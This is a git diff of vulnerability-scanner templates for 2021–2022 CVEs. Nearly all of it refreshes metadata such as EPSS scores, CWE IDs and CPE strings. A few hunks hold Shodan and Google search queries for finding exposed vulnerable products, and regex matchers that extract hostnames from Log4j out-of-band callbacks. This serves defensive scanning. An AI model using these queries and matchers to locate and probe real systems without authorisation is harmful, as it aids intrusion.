- cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*
+ cwe-id: CWE-306
+ epss-score: 0.66748
+ cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9749
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml
index da8b77e82c..8abbd3c46d 100644
--- a/http/cves/2021/CVE-2021-44228.yaml
+++ b/http/cves/2021/CVE-2021-44228.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-20,CWE-917
- epss-score: 0.97569
+ epss-score: 0.97566
cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99996
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml
index 8056e1b30d..a6ce928f87 100644
--- a/http/cves/2021/CVE-2021-44427.yaml
+++ b/http/cves/2021/CVE-2021-44427.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-44427
cwe-id: CWE-89
- epss-score: 0.01567
+ epss-score: 0.04257
cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91177
metadata:
max-request: 1
vendor: rosariosis
diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml
index 1c0afa7192..1228d302c6 100644
--- a/http/cves/2021/CVE-2021-44451.yaml
+++ b/http/cves/2021/CVE-2021-44451.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-44451
cwe-id: CWE-522
- epss-score: 0.00824
+ epss-score: 0.00853
cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80105
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml
index ad4a690e87..2c5eac1103 100644
--- a/http/cves/2021/CVE-2021-44515.yaml
+++ b/http/cves/2021/CVE-2021-44515.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-44515
cwe-id: CWE-287
- epss-score: 0.97483
+ epss-score: 0.97478
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:*
+ epss-percentile: 0.99947
metadata:
max-request: 1
vendor: zohocorp
diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml
index 94129086ee..95cfdcde58 100644
--- a/http/cves/2021/CVE-2021-44528.yaml
+++ b/http/cves/2021/CVE-2021-44528.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-44528
cwe-id: CWE-601
- epss-score: 0.00117
+ epss-score: 0.00087
cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:*
+ epss-percentile: 0.35778
metadata:
max-request: 1
vendor: rubyonrails
diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml
index f6db2be54c..130ebe164b 100644
--- a/http/cves/2021/CVE-2021-44529.yaml
+++ b/http/cves/2021/CVE-2021-44529.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-44529
cwe-id: CWE-94
- epss-score: 0.96445
+ epss-score: 0.95797
cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99192
metadata:
max-request: 1
shodan-query: title:"LANDesk(R) Cloud Services Appliance"
diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml
index d634da58c3..c118a4c82b 100644
--- a/http/cves/2021/CVE-2021-44848.yaml
+++ b/http/cves/2021/CVE-2021-44848.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-203
epss-score: 0.01597
cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85774
metadata:
max-request: 1
vendor: cybelesoft
diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml
index c185240417..cd8e1589bf 100644
--- a/http/cves/2021/CVE-2021-45043.yaml
+++ b/http/cves/2021/CVE-2021-45043.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-45043
cwe-id: CWE-22
- epss-score: 0.07455
+ epss-score: 0.05404
cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9216
metadata:
max-request: 1
google-query: intitle:"HD-Network Real-time Monitoring System V2.0"
diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml
index 7316b957e7..cf72bd1079 100644
--- a/http/cves/2021/CVE-2021-45046.yaml
+++ b/http/cves/2021/CVE-2021-45046.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9
cve-id: CVE-2021-45046
cwe-id: CWE-917
- epss-score: 0.97411
+ epss-score: 0.97405
cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9988
metadata:
max-request: 1
vendor: apache
@@ -58,7 +59,7 @@ http:
- type: regex
part: interactsh_request
regex:
- - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
+ - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
extractors:
- type: kval
@@ -68,10 +69,10 @@ http:
- type: regex
group: 2
regex:
- - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+ - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
group: 1
regex:
- - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
- part: interactsh_request
\ No newline at end of file
+ - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
+ part: interactsh_request
diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml
index 95fa04c967..37b44caf3b 100644
--- a/http/cves/2021/CVE-2021-45092.yaml
+++ b/http/cves/2021/CVE-2021-45092.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-45092
cwe-id: CWE-74
- epss-score: 0.28597
+ epss-score: 0.05789
cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*
+ epss-percentile: 0.92399
metadata:
max-request: 1
vendor: cybelesoft
diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml
index 98f212c739..455bc57ce9 100644
--- a/http/cves/2021/CVE-2021-45232.yaml
+++ b/http/cves/2021/CVE-2021-45232.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-45232
cwe-id: CWE-306
- epss-score: 0.97304
+ epss-score: 0.97298
cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99794
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml
index bb2b58f08d..3c584cb7b4 100644
--- a/http/cves/2021/CVE-2021-45380.yaml
+++ b/http/cves/2021/CVE-2021-45380.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-45380
cwe-id: CWE-79
- epss-score: 0.03708
+ epss-score: 0.02148
cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:*
+ epss-percentile: 0.87858
metadata:
max-request: 1
shodan-query: http.html:"Powerd by AppCMS"
diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml
index f76f3dc3bc..47c712ed6e 100644
--- a/http/cves/2021/CVE-2021-45422.yaml
+++ b/http/cves/2021/CVE-2021-45422.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-45422
cwe-id: CWE-79
- epss-score: 0.00287
+ epss-score: 0.00218
cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*
+ epss-percentile: 0.59071
metadata:
max-request: 1
shodan-query: http.html:"Reprise License"
diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml
index dde1918f98..fc38781ffd 100644
--- a/http/cves/2021/CVE-2021-45428.yaml
+++ b/http/cves/2021/CVE-2021-45428.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-45428
cwe-id: CWE-639
- epss-score: 0.07223
+ epss-score: 0.08441
cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.93587
metadata:
max-request: 3
shodan-query: http.html:"TLR-2005KSH"
diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml
index a8e84f6b70..0b98c4a6f9 100644
--- a/http/cves/2021/CVE-2021-45967.yaml
+++ b/http/cves/2021/CVE-2021-45967.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-45967
cwe-id: CWE-22
- epss-score: 0.54239
+ epss-score: 0.71742
cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97631
metadata:
max-request: 1
vendor: pascom_cloud_phone_system
diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml
index ad89aedfbd..a673b1eff3 100644
--- a/http/cves/2021/CVE-2021-45968.yaml
+++ b/http/cves/2021/CVE-2021-45968.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-45968
cwe-id: CWE-918
- epss-score: 0.00699
+ epss-score: 0.01551
cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:*
+ epss-percentile: 0.85551
metadata:
max-request: 3
vendor: jivesoftware
diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml
index 12e036e849..cf5910473d 100644
--- a/http/cves/2021/CVE-2021-46005.yaml
+++ b/http/cves/2021/CVE-2021-46005.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2021-46005
cwe-id: CWE-79
- epss-score: 0.00135
+ epss-score: 0.00143
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.49483
metadata:
max-request: 3
vendor: car_rental_management_system_project
diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml
index 6244d9d704..6228048dac 100644
--- a/http/cves/2021/CVE-2021-46068.yaml
+++ b/http/cves/2021/CVE-2021-46068.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.8
cve-id: CVE-2021-46068
cwe-id: CWE-79
- epss-score: 0.00093
+ epss-score: 0.00084
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
+ epss-percentile: 0.34592
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml
index 3836b73e23..67c3d71246 100644
--- a/http/cves/2021/CVE-2021-46069.yaml
+++ b/http/cves/2021/CVE-2021-46069.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.8
cve-id: CVE-2021-46069
cwe-id: CWE-79
- epss-score: 0.00093
+ epss-score: 0.00084
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
+ epss-percentile: 0.34592
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml
index ea9adf4100..fb2fb31736 100644
--- a/http/cves/2021/CVE-2021-46071.yaml
+++ b/http/cves/2021/CVE-2021-46071.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.8
cve-id: CVE-2021-46071
cwe-id: CWE-79
- epss-score: 0.00093
+ epss-score: 0.00084
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
+ epss-percentile: 0.34592
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml
index 7c6a2b5497..8d57820f77 100644
--- a/http/cves/2021/CVE-2021-46072.yaml
+++ b/http/cves/2021/CVE-2021-46072.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.8
cve-id: CVE-2021-46072
cwe-id: CWE-79
- epss-score: 0.00093
+ epss-score: 0.00084
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
+ epss-percentile: 0.34592
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml
index d072a7e582..a7c04dd532 100644
--- a/http/cves/2021/CVE-2021-46073.yaml
+++ b/http/cves/2021/CVE-2021-46073.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.8
cve-id: CVE-2021-46073
cwe-id: CWE-79
- epss-score: 0.00093
+ epss-score: 0.00084
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
+ epss-percentile: 0.34592
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml
index 820d50d9a1..3aeb0c27f1 100644
--- a/http/cves/2021/CVE-2021-46379.yaml
+++ b/http/cves/2021/CVE-2021-46379.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-46379
cwe-id: CWE-601
- epss-score: 0.00246
+ epss-score: 0.00247
cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:*
+ epss-percentile: 0.61872
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml
index de726d46f2..0b393ebf37 100644
--- a/http/cves/2021/CVE-2021-46381.yaml
+++ b/http/cves/2021/CVE-2021-46381.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-46381
cwe-id: CWE-22
- epss-score: 0.0131
+ epss-score: 0.01229
cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.8365
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml
index 9f48696ea7..3a5c61f08a 100644
--- a/http/cves/2021/CVE-2021-46387.yaml
+++ b/http/cves/2021/CVE-2021-46387.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-46387
cwe-id: CWE-79
- epss-score: 0.00455
+ epss-score: 0.00475
cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.72639
metadata:
max-request: 1
shodan-query: http.title:"Zywall2Plus"
diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml
index 61130512ba..8c160dd35d 100644
--- a/http/cves/2021/CVE-2021-46417.yaml
+++ b/http/cves/2021/CVE-2021-46417.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-46417
cwe-id: CWE-22
- epss-score: 0.66863
+ epss-score: 0.72699
cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:*
+ epss-percentile: 0.97658
metadata:
max-request: 1
shodan-query: http.html:"Franklin Fueling Systems"
diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml
index c13e9c8d08..b78a305c13 100644
--- a/http/cves/2021/CVE-2021-46422.yaml
+++ b/http/cves/2021/CVE-2021-46422.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-78
epss-score: 0.95441
cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99106
metadata:
max-request: 1
shodan-query: html:"SDT-CW3B1"
diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml
index 7db8fea21f..4591c8fc78 100644
--- a/http/cves/2021/CVE-2021-46424.yaml
+++ b/http/cves/2021/CVE-2021-46424.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-306
epss-score: 0.01459
cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.85053
metadata:
max-request: 3
shodan-query: http.html:"TLR-2005KSH"
diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml
index 6f9991026b..f7c4d426a9 100644
--- a/http/cves/2021/CVE-2021-46704.yaml
+++ b/http/cves/2021/CVE-2021-46704.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-46704
cwe-id: CWE-78
- epss-score: 0.95477
+ epss-score: 0.94979
cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98995
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml
index 1f7ab375b1..613d03ecbe 100644
--- a/http/cves/2022/CVE-2022-0140.yaml
+++ b/http/cves/2022/CVE-2022-0140.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-0140
- cwe-id: CWE-200
- epss-score: 0.00851
+ cwe-id: CWE-306
+ epss-score: 0.01084
cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.82506
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml
index 7858a257d0..590bde1121 100644
--- a/http/cves/2022/CVE-2022-0147.yaml
+++ b/http/cves/2022/CVE-2022-0147.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0147
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00133
cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml
index fcf6700b18..6cf5cc2cf9 100644
--- a/http/cves/2022/CVE-2022-0148.yaml
+++ b/http/cves/2022/CVE-2022-0148.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-0148
cwe-id: CWE-79
- epss-score: 0.00192
+ epss-score: 0.00165
cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.52528
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml
index 893c38ec33..2644f9dd69 100644
--- a/http/cves/2022/CVE-2022-0149.yaml
+++ b/http/cves/2022/CVE-2022-0149.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0149
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00115
cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44376
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml
index dddeee07b8..29a1261060 100644
--- a/http/cves/2022/CVE-2022-0150.yaml
+++ b/http/cves/2022/CVE-2022-0150.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0150
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00133
cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml
index 2201b2690c..46573fe1d7 100644
--- a/http/cves/2022/CVE-2022-0165.yaml
+++ b/http/cves/2022/CVE-2022-0165.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0165
cwe-id: CWE-601
- epss-score: 0.00097
+ epss-score: 0.00133
cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47728
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml
index 37020090e4..431511996c 100644
--- a/http/cves/2022/CVE-2022-0169.yaml
+++ b/http/cves/2022/CVE-2022-0169.yaml
@@ -6,19 +6,28 @@ info:
severity: critical
description: |
The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection
- remediation: This is resolved in release 1.6.0.
reference:
- https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c
- https://wordpress.org/plugins/photo-gallery/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0169
+ - https://plugins.trac.wordpress.org/changeset/2672822/photo-gallery#file9
+ remediation: This is resolved in release 1.6.0.
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
cve-id: CVE-2022-0169
+ cwe-id: CWE-89
+ epss-score: 0.01109
+ cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.82695
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/photo-gallery"
- tags: cve,cve2022,wp,wp-plugin,wordpress,sqli,photo-gallery
-
+ framework: wordpress
+ vendor: 10web
+ product: photo_gallery
+ tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,sqli,photo-gallery
variables:
num: "999999999"
diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml
index f72ea322d1..02fb94a313 100644
--- a/http/cves/2022/CVE-2022-0189.yaml
+++ b/http/cves/2022/CVE-2022-0189.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0189
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00133
cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml
index 7e240de9c2..fc44769404 100644
--- a/http/cves/2022/CVE-2022-0201.yaml
+++ b/http/cves/2022/CVE-2022-0201.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0201
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00115
cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44376
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml
index 02296942a4..aec7e74080 100644
--- a/http/cves/2022/CVE-2022-0206.yaml
+++ b/http/cves/2022/CVE-2022-0206.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0206
cwe-id: CWE-79
- epss-score: 0.00119
+ epss-score: 0.00122
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45705
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml
index d3d4ed29d9..e4aa5e4299 100644
--- a/http/cves/2022/CVE-2022-0208.yaml
+++ b/http/cves/2022/CVE-2022-0208.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0208
cwe-id: CWE-79
- epss-score: 0.00119
+ epss-score: 0.00122
cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45705
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml
index 6176646f60..c3b62c3fef 100644
--- a/http/cves/2022/CVE-2022-0212.yaml
+++ b/http/cves/2022/CVE-2022-0212.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0212
cwe-id: CWE-79
- epss-score: 0.00097
+ epss-score: 0.00099
cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40308
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml
index c1cf8012d8..f26b521e2b 100644
--- a/http/cves/2022/CVE-2022-0218.yaml
+++ b/http/cves/2022/CVE-2022-0218.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0218
cwe-id: CWE-79
- epss-score: 0.03637
+ epss-score: 0.03872
cpe: cpe:2.3:a:codemiq:wordpress_email_template_designer:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90766
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml
index c32d88191a..b01046aad1 100644
--- a/http/cves/2022/CVE-2022-0220.yaml
+++ b/http/cves/2022/CVE-2022-0220.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0220
cwe-id: CWE-116
- epss-score: 0.00165
+ epss-score: 0.00124
cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.46073
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml
index 539ac3c285..f38f4886d5 100644
--- a/http/cves/2022/CVE-2022-0234.yaml
+++ b/http/cves/2022/CVE-2022-0234.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0234
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.00133
cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 1
google-query: inurl:"wp-content/plugins/woocommerce-currency-switcher"
diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml
index 07690b57bd..f8ccfdcc37 100644
--- a/http/cves/2022/CVE-2022-0271.yaml
+++ b/http/cves/2022/CVE-2022-0271.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45304
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml
index 25b5f011c4..69cb9bf825 100644
--- a/http/cves/2022/CVE-2022-0281.yaml
+++ b/http/cves/2022/CVE-2022-0281.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-0281
cwe-id: CWE-200
- epss-score: 0.00478
+ epss-score: 0.00492
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.7314
metadata:
max-request: 1
shodan-query: http.favicon.hash:780351152
diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml
index b89374f105..e3b1fcd814 100644
--- a/http/cves/2022/CVE-2022-0288.yaml
+++ b/http/cves/2022/CVE-2022-0288.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0288
